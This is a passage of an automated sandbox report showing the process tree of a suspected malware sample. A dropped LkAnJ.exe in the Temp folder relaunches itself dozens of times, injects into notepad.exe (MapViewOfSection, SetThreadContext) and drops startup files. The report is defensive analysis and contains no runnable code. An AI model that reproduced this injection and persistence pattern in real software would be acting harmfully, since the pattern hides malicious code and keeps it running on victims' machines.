- Executes dropped EXE
PID:1760
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1760 8770323⤵
- Loads dropped DLL
- Executes dropped EXE
PID:1056 -
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"24⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1232 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"25⤵PID:1268
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"25⤵
- Executes dropped EXE
PID:1256
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1256 8909225⤵
- Loads dropped DLL
- Executes dropped EXE
PID:1548 -
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"26⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2040 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"27⤵PID:988
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"27⤵
- Executes dropped EXE
PID:1824
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1824 9057427⤵
- Loads dropped DLL
- Executes dropped EXE
PID:1908 -
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"28⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1836 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"29⤵
- Drops startup file
PID:1368
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"29⤵
- Executes dropped EXE
PID:1816
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1816 9183729⤵
- Loads dropped DLL
- Executes dropped EXE
PID:1496 -
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"30⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1680 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"31⤵PID:1524
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"31⤵
- Executes dropped EXE
PID:1516
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1516 9319431⤵
- Loads dropped DLL
- Executes dropped EXE
PID:480 -
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"32⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1252 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"33⤵PID:1168
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"33⤵
- Executes dropped EXE
PID:1868
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1868 9445833⤵
- Loads dropped DLL
- Executes dropped EXE
PID:1412 -
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"34⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1544 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"35⤵PID:1984
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"35⤵
- Executes dropped EXE
PID:1976
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1976 9575335⤵
- Loads dropped DLL
- Executes dropped EXE
PID:1552 -
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"36⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:304 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"37⤵PID:736
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"37⤵
- Executes dropped EXE
PID:340
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 340 9725137⤵
- Loads dropped DLL
- Executes dropped EXE
PID:788 -
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"38⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1768 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"39⤵PID:1128
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"39⤵
- Executes dropped EXE
PID:1852
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1852 9860839⤵
- Loads dropped DLL
- Executes dropped EXE
PID:1724 -
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"40⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1592 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"41⤵PID:1812
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"41⤵
- Executes dropped EXE
PID:1256
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1256 9999641⤵
- Loads dropped DLL
- Executes dropped EXE
PID:2036 -
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"42⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:756 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"43⤵PID:1368
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"43⤵
- Executes dropped EXE
PID:520
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 520 10149443⤵
- Loads dropped DLL
- Executes dropped EXE
PID:1836 -
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"44⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1816 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"45⤵PID:1496
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"45⤵PID:1760
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1760 10286745⤵PID:1784
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"46⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:1516 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"47⤵PID:292
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"47⤵PID:1840
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1840 10411547⤵PID:452
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"48⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:616 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"49⤵PID:1552
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"49⤵PID:2016
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 2016 10550349⤵PID:1912
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"50⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:1052 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"51⤵PID:1240
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"51⤵PID:2012
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 2012 10686051⤵PID:1760
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"52⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:1176 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"53⤵PID:1312
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"53⤵PID:1576
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1576 10832753⤵PID:452
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"54⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:784 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"55⤵PID:1172
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"55⤵PID:1472
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1472 10973155⤵PID:1228
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"56⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:1784 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"57⤵PID:288
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"57⤵PID:1528
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1528 11102557⤵PID:1412
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"58⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:552 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"59⤵PID:1488
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"59⤵PID:788
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 788 11241459⤵PID:340
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"60⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:1616 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"61⤵PID:1492
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"61⤵PID:1056
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1056 11378761⤵PID:1772
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"62⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:1412 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"63⤵PID:1964
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"63⤵PID:480
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 480 11534763⤵PID:788
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"64⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:1844 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"65⤵PID:1528
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"65⤵PID:676
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 676 11689165⤵PID:2000
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"66⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:2020 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"67⤵
- Drops startup file
PID:1228
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"67⤵PID:480
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 480 11842067⤵PID:1160
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"68⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:1856 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"69⤵PID:1840
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"69⤵PID:1836
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1836 11982469⤵PID:1632
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"70⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:1772 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"71⤵
- Drops startup file
PID:324
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"71⤵PID:1764
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1764 12122871⤵PID:340
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"72⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:2064 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"73⤵PID:2088
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"73⤵PID:2104
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 2104 12252373⤵PID:2128
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"74⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:2156 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"75⤵
- Drops startup file
PID:2180
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"75⤵PID:2196
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 2196 12402075⤵PID:2220
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"76⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:2248 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"77⤵PID:2272
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"77⤵PID:2288
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 2288 12542477⤵PID:2312
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"78⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:2436 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"79⤵
- Drops startup file
PID:2460
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"79⤵PID:2476
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 2476 12667279⤵PID:2500
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"80⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:2532 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"81⤵
- Drops startup file
PID:2556
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"81⤵PID:2572
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 2572 12810881⤵PID:2592
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"82⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:2632 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"83⤵PID:2656
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"83⤵PID:2672
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 2672 12952783⤵PID:2696
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"84⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:2724 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"85⤵PID:2748
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"85⤵PID:2764
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 2764 13090085⤵PID:2788
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"86⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:2816 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"87⤵PID:2840
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"87⤵PID:2856
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 2856 13225787⤵PID:2876
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"88⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:2908 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"89⤵PID:2932
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"89⤵PID:2948
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 2948 13375589⤵PID:2968
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"90⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:3000 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"91⤵PID:3024
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"91⤵PID:3040
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 3040 13520691⤵PID:3064
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"92⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:324 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"93⤵
- Drops startup file
PID:1228
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"93⤵PID:520
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 520 13656393⤵PID:2096
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"94⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:2148 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"95⤵
- Drops startup file
PID:2152
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"95⤵PID:2172
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 2172 13810795⤵PID:2160
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"96⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:2240 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"97⤵PID:2224
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"97⤵PID:2264
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 2264 13948097⤵PID:2268
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"98⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:2292 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"99⤵PID:2452
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"99⤵PID:2516
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 2516 14085399⤵PID:2440
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"100⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:2480 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"101⤵PID:2540
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"101⤵PID:2536
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 2536 142226101⤵PID:2560
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"102⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:2592 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"103⤵
- Drops startup file
PID:2684
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"103⤵PID:2716
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 2716 143739103⤵PID:2732
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"104⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:392 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"105⤵PID:2800
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"105⤵PID:2784
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 2784 145034105⤵PID:2764
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"106⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:2788 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"107⤵
- Drops startup file
PID:2832
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"107⤵PID:1852
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1852 146360107⤵PID:2900
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"108⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:2860 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"109⤵PID:2916
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"109⤵PID:2960
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 2960 147748109⤵PID:2992
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"110⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:2952 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"111⤵PID:2996
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"111⤵PID:3032
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 3032 149246111⤵PID:576
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"112⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:3040 -
